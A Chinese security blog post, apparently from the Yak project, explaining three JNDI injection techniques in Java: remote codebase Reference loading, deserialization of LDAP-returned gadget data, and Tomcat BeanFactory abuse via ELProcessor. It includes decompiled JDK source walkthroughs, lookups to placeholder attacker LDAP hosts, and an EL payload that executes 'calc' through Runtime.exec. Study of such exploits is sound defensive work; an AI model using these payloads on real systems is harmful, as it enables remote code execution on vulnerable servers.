JNDI的基础利用总结(下篇)

已于 2023-11-08 15:07:31 修改
阅读量66 收藏
点赞数
文章标签: chrome 前端
于 2023-11-08 15:07:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yakproject/article/details/134290083
版权

JNDI核心原理详细分析

01加载远程codebase中的reference

适用前提:

  • 目标出网
  • jdk<8u191

举例分析

此处使用的是ldap协议,因此受影响的版本即8u191以下,此处对应的便是SimpleCommand的情况

查询后返回的entry

attribute内容如下

{objectclass=objectClass: javaNamingReference, javacodebase=javaCodeBase: http://xxx.xxx.xxx.xxx:8000/#SimpleCommand, javafactory=javaFactory: SimpleCommand, javaclassname=javaClassName: SimpleCommand}

 static Object decodeObject(Attributes var0) throws NamingException {
        String[] var2 = getCodebases(var0.get(JAVA_ATTRIBUTES[4]));

        try {
            Attribute var1;
            if ((var1 = var0.get(JAVA_ATTRIBUTES[1])) != null) {
                ClassLoader var3 = helper.getURLClassLoader(var2);
                return deserializeObject((byte[])((byte[])var1.get()), var3);
            } else if ((var1 = var0.get(JAVA_ATTRIBUTES[7])) != null) {
                return decodeRmiObject((String)var0.get(JAVA_ATTRIBUTES[2]).get(), (String)var1.get(), var2);
            } else {
                var1 = var0.get(JAVA_ATTRIBUTES[0]);
                return var1 == null || !var1.contains(JAVA_OBJECT_CLASSES[2]) && !var1.contains(JAVA_OBJECT_CLASSES_LOWER[2]) ? null : decodeReference(var0, var2);
            }
        } catch (IOException var5) {
            NamingException var4 = new NamingException();
            var4.setRootCause(var5);
            throw var4;
        }
    }

按照此处的逻辑首先拿到var2也就是codebasehttp://host:8000/#SimpleCommand

然后取出javaSerializedData存入var1,此处根本不存在这个属性所以为null,进入下一个分支判断;

取出javaRemoteLocation存入var1, 此处也根本不存在这个属性所以为null,进入最后一个else分支;

取出objectClass存入var1,也就是objectClass: javaNamingReference,此处不为null,进入判断是否包含javaNamingReference,大小写都判断一下是否存在,此处显然存在,因此会进入decodeReference()方法,此处传入两个参数,一个是整个attribute,另一个则是最先拿到的codebase var2

private static Reference decodeReference(Attributes var0, String[] var1) throws NamingException, IOException {
        String var4 = null;
        Attribute var2;
        if ((var2 = var0.get(JAVA_ATTRIBUTES[2])) == null) {
            throw new InvalidAttributesException(JAVA_ATTRIBUTES[2] + " attribute is required");
        } else {
            String var3 = (String)var2.get();
            if ((var2 = var0.get(JAVA_ATTRIBUTES[3])) != null) {
                var4 = (String)var2.get();
            }

            Reference var5 = new Reference(var3, var4, var1 != null ? var1[0] : null);
            if ((var2 = var0.get(JAVA_ATTRIBUTES[5])) != null) {
                BASE64Decoder var13 = null;
                ClassLoader var14 = helper.getURLClassLoader(var1);
                Vector var15 = new Vector();
                var15.setSize(var2.size());
                NamingEnumeration var16 = var2.getAll();

                while(var16.hasMore()) {
                    String var6 = (String)var16.next();
                    if (var6.length() == 0) {
                        throw new InvalidAttributeValueException("malformed " + JAVA_ATTRIBUTES[5] + " attribute - " + "empty attribute value");
                    }

                    char var9 = var6.charAt(0);
                    byte var10 = 1;
                    int var11;
                    if ((var11 = var6.indexOf(var9, var10)) < 0) {
                        throw new InvalidAttributeValueException("malformed " + JAVA_ATTRIBUTES[5] + " attribute - " + "separator '" + var9 + "'" + "not found");
                    }

                    String var7;
                    if ((var7 = var6.substring(var10, var11)) == null) {
                        throw new InvalidAttributeValueException("malformed " + JAVA_ATTRIBUTES[5] + " attribute - " + "empty RefAddr position");
                    }

                    int var12;
                    try {
                        var12 = Integer.parseInt(var7);
                    } catch (NumberFormatException var18) {
                        throw new InvalidAttributeValueException("malformed " + JAVA_ATTRIBUTES[5] + " attribute - " + "RefAddr position not an integer");
                    }

                    int var19 = var11 + 1;
                    if ((var11 = var6.indexOf(var9, var19)) < 0) {
                        throw new InvalidAttributeValueException("malformed " + JAVA_ATTRIBUTES[5] + " attribute - " + "RefAddr type not found");
                    }

                    String var8;
                    if ((var8 = var6.substring(var19, var11)) == null) {
                        throw new InvalidAttributeValueException("malformed " + JAVA_ATTRIBUTES[5] + " attribute - " + "empty RefAddr type");
                    }

                    var19 = var11 + 1;
                    if (var19 == var6.length()) {
                        var15.setElementAt(new StringRefAddr(var8, (String)null), var12);
                    } else if (var6.charAt(var19) == var9) {
                        ++var19;
                        if (var13 == null) {
                            var13 = new BASE64Decoder();
                        }

                        RefAddr var17 = (RefAddr)deserializeObject(var13.decodeBuffer(var6.substring(var19)), var14);
                        var15.setElementAt(var17, var12);
                    } else {
                        var15.setElementAt(new StringRefAddr(var8, var6.substring(var19)), var12);
                    }
                }

                for(int var20 = 0; var20 < var15.size(); ++var20) {
                    var5.add((RefAddr)var15.elementAt(var20));
                }
            }

            return var5;
        }
    }

首先判断是否包含必有属性javaClassName,必须得有这个,没有直接返回,再把javaClassName存入var3,此处值为javaClassName: SimpleCommand,再看看有没有javaFactory,这个是可选,假如有就存入var4,此处是包含的值为javaFactory: SimpleCommand,接着便根据javaClassName,javaFactory和codebase值建立一个Reference。接着判断javaReferenceAddress是否为null,此处属性不含这个,因此跳过。直接返回建立的引用Reference

返回到ldapCtx

在此处实例化了远程引用var3

跟进DirectoryManager中的getObjectInstance方法

核心点

factory = getObjectFactoryFromReference(ref, f);

先尝试本地加载,否则用codebase加载。最终因为加载我们的远程恶意类,再静态方法区嵌入恶意代码,实例化过程中被执行

java>8u191 修复原理,对使用codebase进行URLClassloader加载前进行trustURLCodebase判断

在使用远程codebase进行loadClass时不会像上面这样直接去Class.forName()而是

可以看到对trustURLCodebase进行了判断,只有为true才会进行实例化。

需要在SystemProperty中显式设置,否则默认为false

02反序列化恶意返回数据中的serializedData

适用前提:

  • 目标出网
  • 其环境存在可以被利用的序列化gadget

举例分析

import javax.naming.Context;
import javax.naming.InitialContext;

public class mainSer {
    public static void main(String[] args) throws Exception{
        Context context = new InitialContext();
        context.lookup("ldap://host:1389/CC6");
    }
}

这次可以看到返回的属性少了很多,只返回了俩,javaSerializeddata和必有得核心属性javaclassname

前面部分都一样,核心点还是在com.sun.jndi.ldap.Obj#decodeObject()方法中

 static Object decodeObject(Attributes var0) throws NamingException {
        String[] var2 = getCodebases(var0.get(JAVA_ATTRIBUTES[4]));

        try {
            Attribute var1;
            if ((var1 = var0.get(JAVA_ATTRIBUTES[1])) != null) {
                ClassLoader var3 = helper.getURLClassLoader(var2);
                return deserializeObject((byte[])((byte[])var1.get()), var3);
            } else if ((var1 = var0.get(JAVA_ATTRIBUTES[7])) != null) {
                return decodeRmiObject((String)var0.get(JAVA_ATTRIBUTES[2]).get(), (String)var1.get(), var2);
            } else {
                var1 = var0.get(JAVA_ATTRIBUTES[0]);
                return var1 == null || !var1.contains(JAVA_OBJECT_CLASSES[2]) && !var1.contains(JAVA_OBJECT_CLASSES_LOWER[2]) ? null : decodeReference(var0, var2);
            }
        } catch (IOException var5) {
            NamingException var4 = new NamingException();
            var4.setRootCause(var5);
            throw var4;
        }
    }

这次直接在第一个if就符合有javaSerializeddata属性的条件,直接跟进deserializeObject()方法,传入两个参数:

最终在此处readObject触发java原生反序列化

03恶意的Reference Factory工厂类

在高版本中(如:JDK8u191以上版本)虽然不能从远程加载恶意的Factory,但是我们依然可以在返回的Reference中指定Factory Class,这个工厂类必须在受害目标本地的CLASSPATH中。工厂类必须实现 javax.naming.spi.ObjectFactory 接口;并且至少存在一个 getObjectInstance() 方法。org.apache.naming.factory.BeanFactory 刚好满足条件并且存在被利用的可能。

适用前提:

  • 目标出网
  • 目标存在合适的工厂类例如Tomcat中广泛存在的org.apache.naming.factory.BeanFactory

举例分析

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.StringRefAddr;
import javax.script.ScriptEngineManager;

import org.apache.naming.ResourceRef;
import org.apache.naming.factory.BeanFactory;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

public class mainFactory {
    public static void main(String[] args) throws Exception{
     //new ScriptEngineManager().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('calc')");
//        String cmd = "'calc'";
//        String payload = ("{" +
//                "\"\".getClass().forName(\"javax.script.ScriptEngineManager\")" +
//                ".newInstance().getEngineByName(\"JavaScript\")" +
//                ".eval(\"java.lang.Runtime.getRuntime().exec(${command})\")" +
//                "}")
//                .replace("${command}", cmd);
//
//        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "",
//                true, "org.apache.naming.factory.BeanFactory", null);
//        ref.add(new StringRefAddr("forceString", "x=eval"));
//        ref.add(new StringRefAddr("x", payload));
//        ByteArrayOutputStream out = new ByteArrayOutputStream();
//        ObjectOutputStream objOut = new ObjectOutputStream(out);
//        objOut.writeObject(ref);
//        ResourceRef a = (ResourceRef) new ObjectInputStream(new ByteArrayInputStream(out.toByteArray())).readObject();
//
//        System.out.println(a);
        Context context = new InitialContext();
        context.lookup("ldap://host:1389/Tomcat");

    }
}

和反序列化的利用手法有点一致,这里也是进行反序列化

服务器返回的恶意响应如上

 static Object decodeObject(Attributes var0) throws NamingException {
        String[] var2 = getCodebases(var0.get(JAVA_ATTRIBUTES[4]));

        try {
            Attribute var1;
            if ((var1 = var0.get(JAVA_ATTRIBUTES[1])) != null) {
                ClassLoader var3 = helper.getURLClassLoader(var2);
                return deserializeObject((byte[])((byte[])var1.get()), var3);
            } else if ((var1 = var0.get(JAVA_ATTRIBUTES[7])) != null) {
                return decodeRmiObject((String)var0.get(JAVA_ATTRIBUTES[2]).get(), (String)var1.get(), var2);
            } else {
                var1 = var0.get(JAVA_ATTRIBUTES[0]);
                return var1 == null || !var1.contains(JAVA_OBJECT_CLASSES[2]) && !var1.contains(JAVA_OBJECT_CLASSES_LOWER[2]) ? null : decodeReference(var0, var2);
            }
        } catch (IOException var5) {
            NamingException var4 = new NamingException();
            var4.setRootCause(var5);
            throw var4;
        }
    }

因此直接进入第一个if分支,进行反序列化,但是反序列化后还没完,反序列化后拿到的是

var3,这里又和情况1,加载远程codebase中的reference有点类似了,但是此处为ResourceRef,继续跟进

熟悉的getObjectInstance,从Reference中拿instance

ResourceRef[className=javax.el.ELProcessor,factoryClassLocation=null,factoryClassName=org.apache.naming.factory.BeanFactory,{type=scope,content=},{type=auth,content=},{type=singleton,content=true},{type=forceString,content=x=eval},{type=x,content={"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec(String.fromCharCode(99,97,108,99,46,101,120,101))")}}]

从ref中拿我们指定的factory

这里就是初始化本地的factory

核心点,调用了factory的getObjectInstance()我们跟进看看

org.apache.naming.factory.BeanFactory 在 getObjectInstance()中会通过反射的方式实例化Reference所指向的任意Bean Class,并且会调用setter方法为所有的属性赋值。而该BeanClass的类名、属性、属性值,全都来自于Reference对象,均是攻击者可控的。

这个情况下,目标BeanClass必须有一个无参构造方法,有public的setter方法且参数为一个String类型。事实上,这些setter不一定需要是set..开头的方法,根据org.apache.naming.factory.BeanFactory中的逻辑,我们可以把某个方法强制指定为setter。这里,我们找到了javax.el.ELProcessor可以作为目标Class。

可以看到这里主动从ref中拿属性

至此完成利用

复现踩坑点

这个org.apache.naming.factory.BeanFactory在

 <!-- Just a moment... -->
        <dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-catalina</artifactId>
            <version>8.5.75</version>
            <scope>provided</scope>
        </dependency>

依赖中也有el

但是实例化时会报错,缺少ExpressionFactory,必须搭配如下依赖才行

<dependency>
    <groupId>org.apache.tomcat.embed</groupId>
    <artifactId>tomcat-embed-el</artifactId>
    <version>8.5.45</version>
</dependency>

Yak官方资源

Yak 语言官方教程:
https://yaklang.com/docs/intro/
Yakit 视频教程:
https://space.bilibili.com/437503777
Github下载地址:
https://github.com/yaklang/yakit
Yakit官网下载地址:
https://yaklang.com/
Yakit安装文档:
https://yaklang.com/products/download_and_install
Yakit使用文档:
https://yaklang.com/products/intro/
常见问题速查:
https://yaklang.com/products/FAQ

YakProject
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
深入理解JAVA中的JNDI注入
Ms08067安全实验室
08-05 1104
文章来源|MS08067安全实验室本文作者:D_infinite(Java审计培训班讲师)什么是JNDI?简单来说,JNDI (Java Naming and Directory Inte...
JNDI基础利用总结(上篇)
YakProject的博客
11-03 123
在这篇文章,我们简单对JNDI注入的原理进行了分析,对JAVA中的JNDI机制有了更深入的理解,在接下来的文章中将会结合常见的三种JNDI利用场景对他们进行更具体的分析。
JNDI注入原理及利用IDEA漏洞复现
人若无名,便可专心练剑
03-18 1882
本篇文章我也是看过很多的博客写的,中间也遇到很多问题,JNDI注入漏洞的危害还是蛮高的。下面我们从RMI以及DNS协议进行详细的漏洞分析,其中漏洞的危害原因主要是lookup()函数可控,可以执行恶意的命令,从而造成恶意攻击。
JNDI全面总结
深蓝@黄炎龙
10-15 1426
原理:          在DataSource中事先建立多个数据库连接,保存在数据库连接池中。当程序访问数据库时,只用从连接池中取空闲状态的数据库连接即可,访问结束,销毁资源,数据库连接重新回到连接池,这与每次去直接访问数据库相比,会节省大量时间和资源。          JNDI( Java Naming and Directory Interface ),是Java平台的一个标准扩展,提
从Log4j和Fastjson RCE漏洞认识jndi注入
道阻且长,行则将至。
06-10 1363
本文学习了 JNDI 基本概念和 JNDI 注入的基本原理,并通过靶场实践 JNDI 注入漏洞的利用过程,与此同时学习了 Log4j RCE 漏洞(CVE-2021-44228)和 Fastjson 反序列化漏洞(CVE-2017-18349)的原理,并通过靶场实践借助 JNDI 注入完成 RCE 的过程。
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2692
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行。
JVM-基础
柒柒柒柒
07-09 796
jvm基础篇讲解,帮助快速入门
java基础知识系列面试题总结
初级知识储备博客
10-13 4349
面试题总结 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录面试题总结1、什么是面向对象?谈谈你对面向对象的理解一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 1、什么是面向对象?谈谈你对面向对象的理解 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas
Tomcat 源码解析一JNDI
黄裳博客
08-06 1642
Tomcat JNDI 框架
Log4j2的JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2694
前言 最近Log4j2的JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现和分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 一、 前置知识 1.1 Log4j2 Log4j2是一个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4j,Log4j2重新构建和设计了框架,可以认为两者是完全独立的两个日志组
python毕业设计总结范文大全_java毕业设计总结报告(精选范文3篇)
weixin_36342356的博客
01-13 920
作为一门面向对象编程语言,可以编写桌面应用程序、Web应用程序、分布式系统和嵌入式系统应用程序等,在计算机很多方面都有应用,本篇文章就向大家介绍一下java毕业设计总结报告的写作方法,希望对大家有所帮助。一、java毕业设计总结报告总结报告范文一1 研究结论本文通过总结山西信息职业技术学院《Java 程序设计》专业课教学的不足之处与微课程自主学习系统的优势,结合移动学习与翻转课堂的思想,基于微信平...
SpringBoot基础入门篇
qq_53263107的博客
03-18 1549
SpringBoot快速入门
Java知识总结--Spring篇
黄文孝同学的博客
06-17 589
Spring篇 Spring 目录 Spring篇 Spring 1.1.1-什么是框架 1.1.2-什么是Spring 1.1.3-Spring-IOC 1.1.4-DI依赖注入 1.1.5-Spring 的 IOC 有三种注入方式 1.1.6-Spring-AOP 1.1.7-AOP术语 1.1.8-AOP的底层 1.1.9-Spring 的两大核心 1.1.10-Spring 的两大核心接口 1.1.11-BeanFactory的功能 1.1.12-BeanFacto.
【spring大总结】希望所有看完这篇文章的C友,都能快速入门spring
大仙
09-03 6180
Spring快速入门1.spring1.1.优点1.2.缺点1.3.Spring框架的组成结构图1.3.1.核心容器1.3.2.AOP 和设备支持1.3.3.数据访问与集成1.3.4.Web1.3.5.消息(Messaging)1.3.6.Test2.Spring核心ioc2.1.ioc容器2.1.BeanFactory 容器2.1.2\. ApplicationContext 容器2.1.2.1.ClassPathXmlApplicationContext2.1.2.2.FileSystemXmlAppl
chrome打印dom节点不显示节点信息
最新发布
RedXx
08-26 122
正常直接console dom节点。
chrome扩展程序本地打包
zk_tww的博客
08-23 599
本文为Chrome浏览器已安装的扩展程序打包为离线.crx文件,便于在无法访问Chrome商店场景下使用。
Linux安装Miniconda3
码农1479的博客
08-25 230
Linux安装Miniconda3
谷歌浏览器 Google Chrome 禁止扩展.crx更新
肉饼弟弟
08-23 304
谷歌浏览器禁止扩展更新
深入理解JNDI:从基础到实践
"这篇资料主要介绍了JNDI技术,包括其定义、用途、如何使用以及在使用时需要注意的事项。JNDI是Java Naming and Directory Interface的缩写,它为Java应用提供了一种访问命名和目录服务的API,类似于JDBC在数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值